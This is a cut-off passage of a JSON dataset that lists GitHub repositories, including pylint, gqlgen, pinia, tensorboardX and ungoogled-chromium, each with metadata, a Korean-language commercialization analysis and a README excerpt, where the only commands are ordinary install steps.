[Website](https://n","composite_score":0.0503,"license_safety_tag":"unknown"},{"name":"jonhoo/configs","github_url":"https://github.com/jonhoo/configs","stars":5,"language":"Shell","license":"unknown","abandonment_months":2,"description":"# jonhoo/configs 저장소 분석\n\n## 왜 보물인가\n개인의 개발 환경 설정을 정리하고 공유하는 저장소로, 효율적인 업무 세팅을 원하는 전문가들에게 실용적인 참고 자료가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 온보딩 도구**: 새로운 팀원이 빠르게 작업 환경을 구성할 수 있도록 표준화된 설정 제공 서비스\n2. **개발 환경 자","readme_excerpt":"The configuration files are managed with [GNU Stow].\nEach top-level directory represents a \"group\" of configs, and you can\n\"install\" (by symlinking) the configs of a group using\n\n```console\n$ stow -Sv <group>\n```\n\nYou can use `-n` to just show what it _would_ install.\n\nStow has a bunch of [shortcomings], but I haven't bothered to move to\nanything else yet. In theory, the directory layout should be mostly\ncompatible with other tools like [chezmoi] that you may enjoy more,\nthough I have not tried them myself.\n\n[GNU Stow]: https://www.gnu.org/software/stow/\n[shortcomings]: https://github.com/aspiers/stow/issues/33\n[chezmoi]: https://www.chezmoi.io/\n","composite_score":0.0503,"license_safety_tag":"unknown"},{"name":"99designs/gqlgen","github_url":"https://github.com/99designs/gqlgen","stars":7,"language":"Go","license":"MIT","abandonment_months":0,"description":"# gqlgen 프로젝트 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 필요한 데이터를 효율적으로 요청하고 받을 수 있게 해주는 기술로, 개발자들의 작업 시간을 크게 단축시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객 관리 시스템(CRM)이나 프로젝트 관리 도구에서 필요한 정보만 빠르게 불러오도록 지원\n2. **내부 업무 도구**: ","readme_excerpt":"![gqlgen](https://user-images.githubusercontent.com/980499/133180111-d064b38c-6eb9-444b-a60f-7005a6e68222.png)\n\n# gqlgen [![Integration](https://github.com/99designs/gqlgen/actions/workflows/integration.yml/badge.svg)](https://github.com/99designs/gqlgen/actions) [![Coverage Status](https://coveralls.io/repos/github/99designs/gqlgen/badge.svg?branch=master)](https://coveralls.io/github/99designs/gqlgen?branch=master) [![Go Report Card](https://goreportcard.com/badge/github.com/99designs/gqlgen)](https://goreportcard.com/report/github.com/99designs/gqlgen) [![Go Reference](https://pkg.go.dev/badge/github.com/99designs/gqlgen.svg)](https://pkg.go.dev/github.com/99designs/gqlgen) [![Read the Docs](https://badgen.net/badge/docs/available/green)](http://gqlgen.com/)\n\n## What is gqlgen?\n\n[gqlgen](https://github.com/99designs/gqlgen) is a Go library for building GraphQL servers without any fuss.<br/>\n\n- **gqlgen is based on a Schema first approach** — You get to Define your API using the Grap","composite_score":0.0502,"license_safety_tag":"safe"},{"name":"xupefei/QuickLook","github_url":"https://github.com/xupefei/QuickLook","stars":5,"language":"C#","license":"gpl-3.0","abandonment_months":0,"description":"# QuickLook 저장소 분석\n\n## 왜 보물인가\n파일을 빠르게 미리 보기만 하면 되는 상황에서 프로그램을 일일이 실행할 필요 없이 즉시 내용을 확인할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 저장소(구글 드라이브, 드롭박스 같은)에 빠른 미리보기 기능을 추가하여 유료 프리미엄 기능으로 제공\n2. **내부 ","readme_excerpt":"\n<!-- Hero Section with Gradient Background Effect -->\n<picture>\n  <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://user-images.githubusercontent.com/1687847/82130498-8c3eac80-97d4-11ea-9e88-372ab9c50295.png\">\n  <img src=\"https://user-images.githubusercontent.com/1687847/82130498-8c3eac80-97d4-11ea-9e88-372ab9c50295.png\" width=\"140\" alt=\"QuickLook Logo\">\n</picture>\n\n# QuickLook\n\n<div align=\"center\">\n\n<h3>\n  <img src=\"https://raw.githubusercontent.com/Tarikul-Islam-Anik/Animated-Fluent-Emojis/refs/heads/master/Emojis/Activities/Magic%20Wand.png\" width=\"25\" height=\"25\" />\n  <i>Instant File Previews, Just Press Space</i>\n  <img src=\"https://raw.githubusercontent.com/Tarikul-Islam-Anik/Animated-Fluent-Emojis/refs/heads/master/Emojis/Activities/Magic%20Wand.png\" width=\"25\" height=\"25\" />\n</h3>\n\n**The most powerful Quick Look implementation for Windows**\n\n<a href=\"https://trendshift.io/repositories/3258\">\n  <img src=\"https://trendshift.io/api/badge/repositories/3258\" alt=\"Trendin","composite_score":0.0502,"license_safety_tag":"restricted"},{"name":"NVIDIA/flownet2-pytorch","github_url":"https://github.com/NVIDIA/flownet2-pytorch","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":2,"description":"# NVIDIA/flownet2-pytorch 평가 분석\n\n## 왜 보물인가\n동영상에서 물체의 움직임을 자동으로 감지하고 추적하는 NVIDIA의 핵심 기술로, 자율주행차·보안카메라·스포츠 분석 등 수많은 산업에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스포츠 경기 영상에서 선수 움직임을 자동으로 분석하여 코치팀에 제공하는 클","readme_excerpt":"# flownet2-pytorch \n\nPytorch implementation of [FlowNet 2.0: Evolution of Optical Flow Estimation with Deep Networks](https://arxiv.org/abs/1612.01925). \n\nMultiple GPU training is supported, and the code provides examples for training or inference on [MPI-Sintel](http://sintel.is.tue.mpg.de/) clean and final datasets. The same commands can be used for training or inference with other datasets. See below for more detail.\n\nInference using fp16 (half-precision) is also supported.\n\nFor more help, type <br />\n    \n    python main.py --help\n\n## Network architectures\nBelow are the different flownet neural network architectures that are provided. <br />\nA batchnorm version for each network is also available.\n\n - **FlowNet2S**\n - **FlowNet2C**\n - **FlowNet2CS**\n - **FlowNet2CSS**\n - **FlowNet2SD**\n - **FlowNet2**\n\n## Custom layers\n\n`FlowNet2` or `FlowNet2C*` achitectures rely on custom layers `Resample2d` or `Correlation`. <br />\nA pytorch implementation of these layers with cuda kernels are av","composite_score":0.0502,"license_safety_tag":"unknown"},{"name":"lanpa/tensorboardX","github_url":"https://github.com/lanpa/tensorboardX","stars":9,"language":"Python","license":"mit","abandonment_months":2,"description":"# tensorboardX 분석 보고서\n\n## 왜 보물인가\n기계학습 모델의 학습 과정을 실시간으로 시각화하여 개발자가 모델 성능을 쉽게 모니터링할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 모델 개발 SaaS**\n- 기업 고객이 자신의 모델 학습 진행 상황을 대시보드에서 추적하도록 제공하는 구독 서비스\n\n**2. 머신러닝 교육 ","readme_excerpt":"# tensorboardX\n\n[![PyPI version](https://badge.fury.io/py/tensorboardX.svg)](https://badge.fury.io/py/tensorboardX)\n[![Documentation Status](https://readthedocs.org/projects/tensorboardx/badge/?version=latest)](https://tensorboardx.readthedocs.io/en/latest/?badge=latest)\n[![Coverage Status](https://codecov.io/gh/lanpa/tensorboardX/branch/master/graph/badge.svg)](https://codecov.io/gh/lanpa/tensorboardX/)\n\nWrite TensorBoard events with simple function call.\n\nThe current release (v2.6.5) is tested with PyTorch 2.6 / torchvision 0.21.0 / tensorboard 2.19.0 on Python 3.10 to 3.13\n\n* Support `scalar`, `image`, `figure`, `histogram`, `audio`, `text`, `graph`, `onnx_graph`, `embedding`, `pr_curve`, `mesh`, `hyper-parameters`\n  and `video` summaries.\n\n* [FAQ](https://github.com/lanpa/tensorboardX/wiki)\n\n\n## Install\n\n`pip install tensorboardX`\n\nor build from source:\n\n`pip install 'git+https://github.com/lanpa/tensorboardX'`\n\nYou can optionally install [`crc32c`](https://github.com/ICRAR/crc32c)","composite_score":0.05,"license_safety_tag":"safe"},{"name":"bpolaszek/freddie","github_url":"https://github.com/bpolaszek/freddie","stars":5,"language":"PHP","license":"unknown","abandonment_months":3,"description":"# Freddie 저장소 분석\n\n## 왜 보물인가\n별도의 설명이 없어 프로젝트의 정확한 목적을 파악하기 어렵지만, 최근 업데이트(2026년 3월)가 이루어진 활발한 프로젝트로 보입니다.\n\n## 어디에 쓸 수 있나\n1. **금융 자동화 SaaS**: 프로젝트명 'Freddie'가 금융 관련이라면 자동 송금, 청구서 처리 서비스로 중소기업에 판매 가능\n2. *","readme_excerpt":"[![Application](https://github.com/bpolaszek/mercure-x/actions/workflows/app.yml/badge.svg)](https://github.com/bpolaszek/mercure-x/actions/workflows/app.yml)\n[![Coverage](https://codecov.io/gh/bpolaszek/freddie/branch/main/graph/badge.svg?token=uB4gRHyS6r)](https://codecov.io/gh/bpolaszek/freddie)\n\n# Freddie\n\nFreddie is a PHP implementation of the [Mercure Hub Specification](https://mercure.rocks/spec).\n\nIt is blazing fast, built on the shoulders of giants:\n- [PHP](https://www.php.net/releases/8.1/en.php) 8.1\n- [Framework X](https://framework-x.org/) and [ReactPHP](https://reactphp.org/)\n- [Symfony](https://symfony.com/) 6\n- [Redis](https://redis.io/) (optionally).\n\nSee what features are covered and what aren't (yet) [here](#feature-coverage).\n\n## Installation\n\nPHP 8.1+ is required to run the hub.\n\n### As a standalone Mercure hub\n\n```bash\ncomposer create-project freddie/mercure-x freddie && cd freddie\nbin/freddie\n```\n\nThis will start a Freddie instance on `127.0.0.1:8080`, with anonym","composite_score":0.05,"license_safety_tag":"unknown"},{"name":"PyCQA/pylint","github_url":"https://github.com/PyCQA/pylint","stars":7,"language":"Python","license":"gpl-2.0","abandonment_months":0,"description":"# Pylint 저장소 분석\n\n## 왜 보물인가\nPython 코드의 품질을 자동으로 검사해주는 도구로, 프로그래머가 실수를 미리 찾을 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **개발팀 협업 도구**: 회사의 모든 Python 코드가 일정한 품질 기준을 유지하도록 자동 검사하는 SaaS 플랫폼\n2. **기업 코드 관리 시스템**: 대규모 소프트","readme_excerpt":"`Pylint`_\n=========\n\n.. _`Pylint`: https://pylint.readthedocs.io/\n\n.. This is used inside the doc to recover the start of the introduction\n\n.. image:: https://github.com/pylint-dev/pylint/actions/workflows/tests.yaml/badge.svg?branch=main\n    :target: https://github.com/pylint-dev/pylint/actions\n\n.. image:: https://codecov.io/gh/pylint-dev/pylint/branch/main/graph/badge.svg?token=ZETEzayrfk\n    :target: https://codecov.io/gh/pylint-dev/pylint\n\n.. image:: https://img.shields.io/pypi/v/pylint.svg\n    :alt: PyPI Package version\n    :target: https://pypi.python.org/pypi/pylint\n\n.. image:: https://readthedocs.org/projects/pylint/badge/?version=latest\n    :target: https://pylint.readthedocs.io/en/latest/?badge=latest\n    :alt: Documentation Status\n\n.. image:: https://img.shields.io/badge/code%20style-black-000000.svg\n    :target: https://github.com/ambv/black\n\n.. image:: https://img.shields.io/badge/linting-pylint-yellowgreen\n    :target: https://github.com/pylint-dev/pylint\n\n.. image:: http","composite_score":0.0499,"license_safety_tag":"restricted"},{"name":"PaddlePaddle/PaddleX","github_url":"https://github.com/PaddlePaddle/PaddleX","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# PaddleX 저장소 평가\n\n## 왜 보물인가\n사진이나 영상을 자동으로 분석하는 인공지능 도구를 누구나 쉽게 만들 수 있게 해주는 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n\n1. **제조업 품질검사 SaaS**: 공장의 불량품을 자동으로 찾아내는 클라우드 서비스로 판매\n2. **유통업 재고관리 API**: 편의점 선반의 상품을 자동으로 인식하는 시스템을","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/cuicheng01/PaddleX_doc_images/main/images/logo.png\" width=\"735\" height =\"200\" alt=\"PaddleX\" align=\"middle\" />\n</p>\n\n<p align=\"center\">\n    <a href=\"./LICENSE\"><img src=\"https://img.shields.io/badge/License-Apache%202-red.svg\"></a>\n    <a href=\"\"><img src=\"https://img.shields.io/badge/Python-3.8~3.13-blue.svg\"></a>\n    <a href=\"\"><img src=\"https://img.shields.io/badge/OS-Linux%2C%20Windows%2C%20Mac-orange.svg\"></a>\n    <a href=\"\"><img src=\"https://img.shields.io/badge/Hardware-CPU%2C%20GPU%2C%20XPU%2C%20NPU%2C%20MLU%2C%20DCU-yellow.svg\"></a>\n</p>\n\n<h4 align=\"center\">\n  <a href=#-特性>🌟 特性</a> | <a href=https://aistudio.baidu.com/application/center/app?tag=%E5%85%A8%E9%83%A8&flod=86503>🌐 在线体验</a>｜<a href=#️-快速开始>🚀 快速开始</a> | <a href=https://paddlepaddle.github.io/PaddleX/latest/index.html> 📖 文档</a> | <a href=#-能力支持> 🔥能力支持</a> | <a href=https://paddlepaddle.github.io/PaddleX/latest/support_list/models_list.html> 📋 模型列表</a>\n\n</","composite_score":0.0499,"license_safety_tag":"safe"},{"name":"t1m0thyj/WinDynamicDesktop","github_url":"https://github.com/t1m0thyj/WinDynamicDesktop","stars":7,"language":"C#","license":"MPL-2.0","abandonment_months":2,"description":"# WinDynamicDesktop 상용화 분석\n\n## 왜 보물인가\nWindows 사용자가 매일 보는 바탕화면을 자동으로 아름답게 변경해주는 프로그램으로, 단순하지만 많은 사람들이 원하는 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독으로 프리미엄 테마 라이브러리를 제공하는 온라인 서비스\n2. **내부 업무 도구**: ","readme_excerpt":"<p align=\"center\">\n<img src=\"https://github.com/t1m0thyj/WinDynamicDesktop/blob/main/uwp/Images/Square44x44Logo.scale-200.png?raw=true\">\n<br/>\n<a href=\"https://github.com/t1m0thyj/WinDynamicDesktop/releases\"><img src=\"https://img.shields.io/github/downloads/t1m0thyj/WinDynamicDesktop/total.svg?style=flat-square\" alt=\"GitHub releases\"></a>\n<a href=\"https://apps.microsoft.com/detail/9NM8N7DQ3Z5F\"><img src=\"https://img.shields.io/endpoint?url=https%3A%2F%2Fmicrosoft-store-badge.fly.dev%2Fapi%2Frating%3FstoreId%3D9NM8N7DQ3Z5F%26market%3DUS&style=flat-square&color=blue&logo=\" alt=\"Microsoft Store rating\"></a>\n<a href=\"https://github.com/t1m0thyj/WinDynamicDesktop/actions/workflows/build.yml\"><img src=\"https://img.shields.io/github/actions/workflow/status/t1m0thyj/WinDynamicDesktop/build.yml?branch=main&logo=github&style=flat-square\" alt=\"Build status\"></a>\n</p>\n\n# WinDynamicDesktop\nPort of macOS Mojave Dynamic Desktop feature to Windows 10 and 11. Available on GitHub and the Microsoft Store","composite_score":0.0499,"license_safety_tag":"unknown"},{"name":"equinusocio/material-theme","github_url":"https://github.com/equinusocio/material-theme","stars":5,"language":"","license":"unknown","abandonment_months":1,"description":"# Material Theme 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱의 외형을 아름답게 꾸며주는 디자인 템플릿으로, 별도의 디자인 비용 없이 전문적인 모습을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 자신의 웹 애플리케이션에 이 디자인을 적용하여 출시 속도를 높일 수 있습니다.\n2. **내부 업무 도구**","readme_excerpt":"<!-- PROJECT LOGO -->\n<br />\n<div align=\"center\">\n  <a href=\"https://vira.build\">\n  <img src=\"https://vira-themes.github.io/vira-assets/assets/vira/vira-logo-symbol.png\" alt=\"Vira Software\" width=\"90\" height=\"90\" />\n  </a>\n\n  <h3 align=\"center\" title=\"Vira Theme\">\n    Vira Software Public Assets\n  </h3>\n\n  <p align=\"center\">\n    <a href=\"https://vira.build\"><strong>vira.build</strong></a>\n    <br />\n  </p>\n</div>\n\n<img src=\"https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fmineblocks.com%2F1%2Fwiki%2Fimages%2F5%2F59%2FEmpty.png\" height=\"80\">\n\n## Our products\n\n<table style=\"width:100%; table-layout: fixed; border-collapse: separate; border-spacing: 24px;\">\n  <tr>\n    <td style=\"padding: 0; border: 0; vertical-align: top; min-width: 400px\">\n      <h4>Vira Theme</h4>\n      <a href=\"https://vira.build\">\n        vira.build\n      </a>\n      <!-- <a href=\"https://vira-themes.github.io/vira-assets/assets/previews/teal.webp\"><img src=\"https://vira-themes.github.io/vira-assets/assets/p","composite_score":0.0498,"license_safety_tag":"unknown"},{"name":"posva/pinia","github_url":"https://github.com/posva/pinia","stars":15,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Pinia 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 데이터를 효율적으로 관리해주는 필수 도구로, 개발자의 생산성을 크게 높입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 복잡한 대시보드를 가진 프로젝트 관리 웹앱에서 사용자 정보와 프로젝트 데이터를 빠르게 처리\n2. **내부 업무 도구**: 기업 직원들이 사용하는 인사","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://pinia.vuejs.org\" target=\"_blank\" rel=\"noopener noreferrer\">\n    <img width=\"180\" src=\"https://pinia.vuejs.org/logo.svg\" alt=\"Pinia logo\">\n  </a>\n</p>\n<br/>\n<p align=\"center\">\n  <a href=\"https://npmx.dev/package/pinia\"><img src=\"https://badgen.net/npm/v/pinia/^4\" alt=\"npm package\"></a>\n  <a href=\"https://github.com/vuejs/pinia/actions/workflows/ci.yml\"><img src=\"https://github.com/vuejs/pinia/actions/workflows/ci.yml/badge.svg\" alt=\"build status\"></a>\n  <a href=\"https://codecov.io/gh/vuejs/pinia\"><img src=\"https://codecov.io/gh/vuejs/pinia/branch/v4/graph/badge.svg?token=rU2xxQ6BGH\"/></a>\n</p>\n<br/>\n\n# Pinia\n\n> Intuitive, type safe and flexible Store for Vue\n\n- 💡 Intuitive\n- 🔑 Type Safe\n- ⚙️ Devtools support\n- 🔌 Extensible\n- 🏗 Modular by design\n- 📦 Extremely light\n- ⛰️ Nuxt Module\n\nThe latest version of pinia works with Vue 3. See the branch [v2](https://github.com/vuejs/pinia/tree/v2) for a version that works with Vue 2.\n\nPinia is the most similar ","composite_score":0.0497,"license_safety_tag":"safe"},{"name":"dafthack/CloudPentestCheatsheets","github_url":"https://github.com/dafthack/CloudPentestCheatsheets","stars":6,"language":"","license":"MIT","abandonment_months":2,"description":"# CloudPentestCheatsheets 분석\n\n## 왜 보물인가\n클라우드 보안 검사에 필요한 모든 실용적인 방법들을 한곳에 정리한 참고서로, 보안 전문가들이 즉시 활용할 수 있는 실전 노하우를 담고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 보안 진단 SaaS 서비스**: 기업의 AWS/Azure/구글 클라우드 계정 취약점을 자동으로 ","readme_excerpt":"# CloudPentestCheatsheets\nThis repository contains a collection of cheatsheets I have put together for tools related to pentesting organizations that leverage cloud providers.\n\nThe focus is offensive cloud enumeration and understanding an environment quickly. These sheets are not intended to be exhaustive cloud administration references.\n\n## Cheatsheets\n[Microsoft Azure & O365](cheatsheets/Azure.md)\n\n[Amazon Web Services](cheatsheets/AWS.md)\n\n[Google Cloud Platform](cheatsheets/GCP.md)\n\n[Other Useful Cloud Tools & Techniques](cheatsheets/OtherTools.md)\n\n\n## References and Resources\nI leveraged a number of different books and blogs to put together these lists. While this is not a comprehensive list I wanted to recognize and thank the sources listed in the References & Resources page linked below.\n\n[References & Resources](cheatsheets/ReferencesAndResources.md)\n","composite_score":0.0497,"license_safety_tag":"safe"},{"name":"react-native-community/react-native-svg","github_url":"https://github.com/react-native-community/react-native-svg","stars":7,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# React Native SVG 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱에서 깔끔하고 선명한 그래프, 아이콘, 도형을 쉽게 그릴 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **핀테크 앱의 자산 관리 서비스**: 실시간 주식 차트, 포트폴리오 시각화를 제공하는 앱\n2. **의료 모바일 앱**: 환자의 건강 지표를 그래프로 표시하고 진료 기록을","readme_excerpt":"<img src=\"https://user-images.githubusercontent.com/39658211/200319759-006c214f-941c-496c-a3c2-7de5b7ce33dc.png\" width=\"100%\" alt=\"React Native SVG at Software Mansion\" >\n\n[![Version](https://img.shields.io/npm/v/react-native-svg.svg)](https://www.npmjs.com/package/react-native-svg)\n[![NPM](https://img.shields.io/npm/dm/react-native-svg.svg)](https://www.npmjs.com/package/react-native-svg)\n\n`react-native-svg` provides SVG support to React Native on iOS, Android, macOS, Windows, and a compatibility layer for the web.\n\n[Check out the Example app](https://github.com/software-mansion/react-native-svg/tree/main/apps/common/example)\n\n- [Features](#features)\n- [Installation](#installation)\n- [Troubleshooting](#troubleshooting)\n- [Opening issues](#opening-issues)\n- [Usage](#usage)\n- [Known issues](#known-issues)\n\n## Features\n\n1. Supports most SVG elements and properties (Rect, Circle, Line, Polyline, Polygon, G ...).\n2. Easy to [convert SVG code](https://svgr.now.sh/) to react-native-svg.\n\n## ","composite_score":0.0496,"license_safety_tag":"safe"},{"name":"atech/postal","github_url":"https://github.com/atech/postal","stars":6,"language":"Ruby","license":"mit","abandonment_months":0,"description":"# atech/postal 분석 보고서\n\n## 왜 보물인가\n이메일을 자동으로 보내고 관리하는 시스템으로, 회사들이 고객에게 자동으로 알림이나 안내를 보낼 때 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **이메일 발송 SaaS**: 기업이 구독해서 대량의 고객 이메일을 자동 발송하는 웹 서비스\n2. **내부 알림 시스템**: 회사 내부에서 직원들에","readme_excerpt":"![GitHub Header](https://github.com/postalserver/.github/assets/4765/7a63c35d-2f47-412f-a6b3-aebc92a55310)\n\n**Postal** is a complete and fully featured mail server for use by websites & web servers. Think Sendgrid, Mailgun or Postmark but open source and ready for you to run on your own servers. \n\n* [Documentation](https://docs.postalserver.io)\n* [Installation Instructions](https://docs.postalserver.io/getting-started)\n* [FAQs](https://docs.postalserver.io/welcome/faqs) & [Features](https://docs.postalserver.io/welcome/feature-list)\n* [Discussions](https://github.com/postalserver/postal/discussions) - ask for help or request a feature\n* [Join us on Discord](https://discord.postalserver.io)\n","composite_score":0.0496,"license_safety_tag":"safe"},{"name":"Eloston/ungoogled-chromium","github_url":"https://github.com/Eloston/ungoogled-chromium","stars":16,"language":"Python","license":"bsd-3-clause","abandonment_months":0,"description":"# Ungoogled-Chromium 저장소 분석\n\n## 왜 보물인가\nGoogle의 추적 기능을 제거한 개인정보 보호 중심의 웹브라우저로, 개인정보 침해에 민감한 사용자들의 수요가 지속적으로 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개인정보 보호 SaaS**: 기업용 보안 브라우저 솔루션으로 패키징하여 구독형으로 판매\n2. **내부 업무 도구","readme_excerpt":"# ungoogled-chromium\n\n*A lightweight approach to removing Google web service dependency*\n\n**Help is welcome!** See the [docs/contributing.md](docs/contributing.md) document for more information.\n\n## Objectives\n\nIn descending order of significance (i.e. most important objective first):\n\n1. **ungoogled-chromium is Google Chromium, sans dependency on Google web services**.\n2. **ungoogled-chromium retains the default Chromium experience as closely as possible**. Unlike other Chromium forks that have their own visions of a web browser, ungoogled-chromium is essentially a drop-in replacement for Chromium.\n3. **ungoogled-chromium features tweaks to enhance privacy, control, and transparency**. However, almost all of these features must be manually activated or enabled. For more details, see [Feature Overview](#feature-overview).\n\nIn scenarios where the objectives conflict, the objective of higher significance should take precedence.\n\n## Content Overview\n\n* [Objectives](#objectives)\n* [Motivat","composite_score":0.0495,"license_safety_tag":"safe"},{"name":"AsynkronIT/protoactor-go","github_url":"https://github.com/AsynkronIT/protoactor-go","stars":19,"language":"Go","license":"apache-2.0","abandonment_months":2,"description":"# Proto Actor Go 분석 보고서\n\n## 왜 보물인가\n여러 작업을 동시에 처리해야 하는 복잡한 소프트웨어를 빠르고 안정적으로 만들 수 있도록 도와주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n- **실시간 메시징 SaaS**: Slack 같은 즉시 통신 플랫폼에서 동시에 수천 명의 메시지를 처리\n- **금융 거래 API 판매**: 주식·암호화폐","readme_excerpt":"[![Go Report Card](https://goreportcard.com/badge/github.com/asynkron/protoactor-go)](https://goreportcard.com/report/github.com/asynkron/protoactor-go)\n[![GoDoc](https://godoc.org/github.com/asynkron/protoactor-go?status.svg)](https://godoc.org/github.com/asynkron/protoactor-go)\n[![checks](https://github.com/asynkron/protoactor-go/actions/workflows/checks.yml/badge.svg)](https://github.com/asynkron/protoactor-go/actions/workflows/checks.yml)\n[![Sourcegraph](https://sourcegraph.com/github.com/asynkron/protoactor-go/-/badge.svg)](https://sourcegraph.com/github.com/asynkron/protoactor-go?badge)\n\n### [Join our Slack channel](https://join.slack.com/t/asynkron/shared_invite/zt-ko824601-yGN1d3GHF9jzZX2VtONodQ)\n\n# Cross platform actors\n\nIntroducing cross platform actor support between Go and C#.\n\nCan I use this?\nThe Go implementation is still in beta, there are users using Proto Actor for Go in production already.\nBut be aware that the API might change over time until 1.0.\n\n## Sourcecode - Go","composite_score":0.0494,"license_safety_tag":"safe"},{"name":"susiai/susi_partners","github_url":"https://github.com/susiai/susi_partners","stars":11,"language":"CSS","license":"unknown","abandonment_months":4,"description":"# susiai/susi_partners 평가 분석\n\n## 왜 보물인가\nSUSI AI의 파트너 생태계를 관리하는 플랫폼으로, AI 기업들의 협력 네트워크를 체계화할 수 있는 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AI 개발사들이 자신의 솔루션을 연결·판매할 수 있는 마켓플레이스 제공\n2. **내부 업무 도구**: 기업 간 파","readme_excerpt":"# susi_chat\n\nWe implement a chat interface to communicate with a LLM. The following ways of communication are possible:\n\n- using a command-line console within your Linux/Mac/Windows terminal\n- using a command-line console within a Browser using Javascript to simulate the same environment that you can experience with the terminal\n- using a voice interface: console inputs are done via speech recognition and responses are done either on a console or using text-to-speech\n\nAll of those options shall be possible either on a normal computer or using a Raspberry Pi\nwhich also should be able to show that the whole operation is done without internet connection.\n\n![SUSI terminal example](chat_terminal/img/chat_terminal.png)\n\n## Running a chat server\n\nWe need a LLM as back-end for the chat. We use llama.cpp for this. To run the server, do:\n\n```\n# clone and build llama.cpp (do this just once)\ncd ..\ngit clone https://github.com/ggerganov/llama.cpp.git\ncd llama.cpp\nmake\n\n# get model (here: one which ","composite_score":0.0493,"license_safety_tag":"unknown"},{"name":"kickstarter/ios-oss","github_url":"https://github.com/kickstarter/ios-oss","stars":5,"language":"Swift","license":"apache-2.0","abandonment_months":0,"description":"# Kickstarter iOS 앱 분석\n\n## 왜 보물인가\n세계 최대 크라우드펀딩 플랫폼의 공식 iOS 앱 코드로, 수백만 사용자를 확보한 검증된 서비스의 기술 아키텍처를 그대로 학습할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **크라우드펀딩 플랫폼 SaaS**: 자체 펀딩 서비스를 시작하는 스타트업이 기본 아키텍처 참고용으로 구매 가능\n2. **투","readme_excerpt":"<a href=\"https://www.kickstarter.com\"><img src=\".github/ksr-wordmark.svg\" width=\"36%\" alt=\"Kickstarter for iOS\"></a>\n\n[![Circle CI](https://circleci.com/gh/kickstarter/ios-oss.svg?style=svg)](https://circleci.com/gh/kickstarter/ios-oss)\n\nWelcome to Kickstarter’s open source iOS app! Come on in, take your shoes off,\nstay a while—explore how Kickstarter’s native squad has built and continues to\nbuild the app.\n\nWe’ve also open sourced our [Android app](https://github.com/kickstarter/android-oss),\nand read more about our journey to open source [here](https://kickstarter.engineering/open-sourcing-our-android-and-ios-apps-6891be909fcd).\n\n## Getting Started\n\n1. Install Xcode. We currently support XCode 14.3 Swift 5.8.\n2. Clone this repository.\n\n&#42; To provide a mock version that serves up hard-coded data immediately, set `KsApi.Secrets.isOSS` = `true`.\n\n## Some fun things to explore\n\nIf you’re just looking for a quick glance at a few things we’re particularly\nproud of, look no further:\n\n* T","composite_score":0.0492,"license_safety_tag":"safe"},{"name":"willmcgugan/rich.tui","github_url":"https://github.com/willmcgugan/rich.tui","stars":47,"language":"Python","license":"MIT","abandonment_months":0,"description":"# Rich.TUI 저장소 분석\n\n## 왜 보물인가\n터미널(검은 창)을 아름답고 사용하기 쉽게 만드는 도구로, 데이터를 시각적으로 보여주는 프로그램이나 서비스를 만드는 사람들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 관리 SaaS**: AWS, 구글 클라우드 같은 서비스를 명령어로 조작할 때 깔끔한 화면으로 상태를 표시하는 도구\n","readme_excerpt":"\n\n[![Discord](https://img.shields.io/discord/1026214085173461072)](https://discord.gg/Enf6Z3qhVr)\n[![Supported Python Versions](https://img.shields.io/pypi/pyversions/textual)](https://pypi.org/project/textual/)\n[![PyPI version](https://badge.fury.io/py/textual.svg?)](https://badge.fury.io/py/textual)\n![OS support](https://img.shields.io/badge/OS-macOS%20Linux%20Windows-red)\n\n\n\n![textual-splash](https://github.com/user-attachments/assets/4caeb77e-48c0-4cf7-b14d-c53ded855ffd)\n\n# Textual\n\n<img align=\"right\" width=\"250\" alt=\"clock\" src=\"https://github.com/user-attachments/assets/63e839c3-5b8e-478d-b78e-cf7647eb85e8\" />\n\nBuild cross-platform user interfaces with a simple Python API. Run your apps in the terminal *or* a web browser.\n\nTextual's API combines modern Python with the best of developments from the web world, for a lean app development experience.\nDe-coupled components and an advanced [testing](https://textual.textualize.io/guide/testing/) framework ensure you can maintain your ap","composite_score":0.0489,"license_safety_tag":"safe"},{"name":"dmytrodanylyk/circular-progress-button","github_url":"https://github.com/dmytrodanylyk/circular-progress-button","stars":5,"language":"Java","license":"mit","abandonment_months":0,"description":"# Circular Progress Button 상용화 분석\n\n## 왜 보물인가\n앱이나 웹사이트에서 작업 진행 상황을 시각적으로 보여주는 버튼 디자인으로, 사용자 경험을 크게 향상시킬 수 있는 재사용 가능한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **파일 업로드 서비스**: 문서나 이미지 업로드 시 원형 진행 표시기로 완료 단계를 시각화\n2. **결제","readme_excerpt":"**Note:** updated version of this library will be available 